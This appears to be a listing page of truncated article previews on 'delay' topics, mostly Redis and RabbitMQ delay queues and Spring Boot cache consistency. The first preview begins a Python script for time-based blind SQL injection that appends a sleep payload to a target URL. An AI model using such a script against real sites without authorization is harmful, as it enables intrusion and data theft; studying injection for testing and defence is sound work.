SQL injection: delayed injection of python universal script

SQL injection: delayed injection of python script import requests import binascii def judgment_delay(complete_url): headers={<!– –> “User-Agent”:”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36″ } try: requests.get(url=complete_url,headers=headers,timeout=3) except requests.exceptions.ReadTimeout: return “time out” else: return “normal” def judgment_exploit(url): payload=” and sleep(6) #” complete_url=url + payload num=judgment_delay(complete_url) if “time out” in num: print(“[ + […]

SpringBoot AOP + Redis delayed double deletion to ensure data consistency

SpringBoot AOP + Redis Delayed double deletion ensures data consistency 1. Business scenario 1.1 Problems When using Redis as a cache, there will be inconsistencies between the data in Redis and the database data. In the subsequent query process, it will take a long time to check Redis first, thus The occurrence of queried data […]

An in-depth introduction to RabbitMQ: sequential consumption, dead letter queue and delay queue

1. RabbitMQ 1.1 Core Components RabbitMQ is an open source message middleware that implements the Advanced Message Queuing Protocol (AMQP) and provides various important components to support the production, transmission and consumption of messages. Producer: The producer is the sender of messages and is responsible for publishing messages to the RabbitMQ server. Messages can contain […]

Redis implements delay queue

Use Redis to implement delay queue Implementation ideas As a high-performance NoSQL database, redis has the characteristics of fast reading and writing, high concurrency, and data persistence. It is very suitable for implementing delay queues. Redis provides a rich data structure. A simple delay queue can be implemented using the ZSET set (ordered set) data […]

How does RabbitMQ implement a delay queue?

Delay queue means that after a message is sent, it is not executed immediately, but waits for a specific time before the consumer executes the message. The usage scenarios of delay queue include the following: Orders not paid on time will be canceled after 30 minutes expires. Push messages to users with low activity after […]

Spring Boot + Redis delayed double deletion function, actual combat is here!

Because the official account has changed the push rules, please click “Looking” and add “star” to get exciting technology sharing as soon as possible Click to follow the #InternetArchitect official account and get the full set of architect information here 0,2T architect learning materials dry content Previous article: Sharing of useful learning materials for 2T […]

redis implements distributed delay queue

Article directory Introduction to delay queue Application scenarios Case: consider: accomplish: the whole idea: Implementation producer consumer operation result Advantages of redis distributed delay queue Disadvantages of redis distributed delay queue Introduction to delay queue Delay queue is a special message queue that allows messages to be consumed after a certain delay time. The main […]